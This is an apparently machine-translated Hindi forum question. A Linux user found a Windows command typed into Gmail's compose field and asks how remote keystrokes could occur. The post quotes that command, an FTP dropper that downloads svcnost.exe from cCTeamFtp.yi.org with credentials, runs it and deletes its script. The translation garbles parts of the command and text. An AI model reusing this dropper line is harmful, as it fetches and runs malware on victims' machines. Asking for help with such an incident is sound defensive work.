मेरा घर पीसी आमतौर पर चालू है, लेकिन मॉनिटर बंद है। आज शाम को मैं काम से घर आया और पाया कि हैक की कोशिश क्या दिखती है: मेरे ब्राउज़र में, मेरा जीमेल खुला था (वह मैं था), लेकिन यह TOक्षेत्र में निम्नलिखित के साथ कंपोज़ मोड में था :
md / c इको ओपन cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & इको बाइनरी >> ik & इको मिल svcnost.exe >> ik & इको इच >> ik & ftp -n -v -s: ik & del ik & svcnost.exe और बाहर निकलें प्रतिध्वनि आपको मिल गई
यह मेरे लिए विंडोज कमांड लाइन कोड की तरह दिखता है, और कोड की mdशुरुआत इस तथ्य के साथ संयुक्त है कि जीमेल कम्पोज मोड में था, यह स्पष्ट करता है कि किसी ने cmdकमांड चलाने की कोशिश की थी । मुझे लगता है कि मैं भाग्यशाली था कि मैं वास्तव में इस पीसी पर विंडोज नहीं चलाता हूं, लेकिन मेरे पास अन्य हैं जो करते हैं। ऐसा पहली बार हुआ है जब मेरे साथ ऐसा कुछ हुआ है। मैं लिनक्स गुरु नहीं हूं, और मैं उस समय फ़ायरफ़ॉक्स के अलावा कोई अन्य कार्यक्रम नहीं चला रहा था।
मुझे पूरा यकीन है कि मैंने यह नहीं लिखा था, और मेरे कंप्यूटर पर कोई और नहीं शारीरिक रूप से था। इसके अलावा, मैंने हाल ही में अपना Google पासवर्ड (और मेरे सभी अन्य पासवर्ड) कुछ इस तरह से बदले हैं vMA8ogd7bvकि मुझे नहीं लगता कि किसी ने मेरा Google खाता हैक किया है।
अभी क्या हुआ? किसी ने मेरे कंप्यूटर पर कीस्ट्रोक्स कैसे लगाया है जब यह दादी की पुरानी विंडोज मशीन नहीं है जो सालों से मैलवेयर चला रहा है, लेकिन हाल ही में नया उबंटू स्थापित किया गया है?
अपडेट:
मुझे कुछ बिंदुओं और प्रश्नों के बारे में बताएं:
- मैं ऑस्ट्रिया में, ग्रामीण इलाकों में हूं। मेरा WLAN रूटर WPA2 / PSK और एक मध्यम-मजबूत पासवर्ड चलाता है जो शब्दकोश में नहीं है; ब्रूट-फोर्स और यहाँ से 50 मीटर से कम की दूरी पर होना चाहिए; यह संभावना नहीं है कि यह हैक हो गया।
- मैं USB वायर्ड कीबोर्ड का उपयोग कर रहा हूं, इसलिए फिर से इसकी संभावना नहीं है कि कोई भी इसे हैक करने के लिए सीमा के भीतर हो सकता है।
- मैं उस समय अपने कंप्यूटर का उपयोग नहीं कर रहा था; जब मैं काम पर था तब यह घर पर बेकार था। यह एक मॉनिटर-माउंटेड नेटटॉप पीसी है, इसलिए मैं शायद ही कभी इसे बंद करता हूं।
- मशीन केवल दो महीने पुरानी है, केवल उबंटू चलाता है, और मैं अजीब सॉफ़्टवेयर का उपयोग नहीं कर रहा हूं या अजीब साइटों का दौरा नहीं कर रहा हूं। यह मुख्य रूप से स्टैक एक्सचेंज, जीमेल और समाचार पत्र हैं। खेलना बंद। उबंटू खुद को अद्यतित रखने के लिए सेट है।
- मुझे किसी VNC सेवा के चलने की जानकारी नहीं है; मैंने निश्चित रूप से एक स्थापित या सक्षम नहीं किया है। मैंने कोई अन्य सर्वर भी शुरू नहीं किया है। अगर कोई डिफ़ॉल्ट रूप से उबंटू में चल रहा है तो मैं अनिश्चित हूं?
- मुझे जीमेल की खाता गतिविधि के सभी आईपी पते पता हैं। मुझे पूरा यकीन है कि Google एक प्रवेश द्वार नहीं था।
- मुझे एक लॉग फ़ाइल व्यूअर मिला , लेकिन मुझे नहीं पता कि क्या देखना है। मदद?
जो मैं वास्तव में जानना चाहता हूं, और जो मुझे वास्तव में असुरक्षित महसूस कराता है, वह है: इंटरनेट से कोई भी मेरी मशीन पर कीस्ट्रोक्स उत्पन्न कर सकता है? मैं इसके बारे में सभी टिनफ़ोइल-टोपी होने के बिना इसे कैसे रोक सकता हूं? मैं लिनक्स गीक नहीं हूं, मैं एक पिता हूं जिसने 20+ वर्षों के लिए विंडोज के साथ खिलवाड़ किया है और इससे थक गया हूं। और ऑनलाइन होने के सभी 18+ वर्षों में, मैंने व्यक्तिगत रूप से कभी कोई हैक प्रयास नहीं देखा है, इसलिए यह मेरे लिए नया है।
password:-)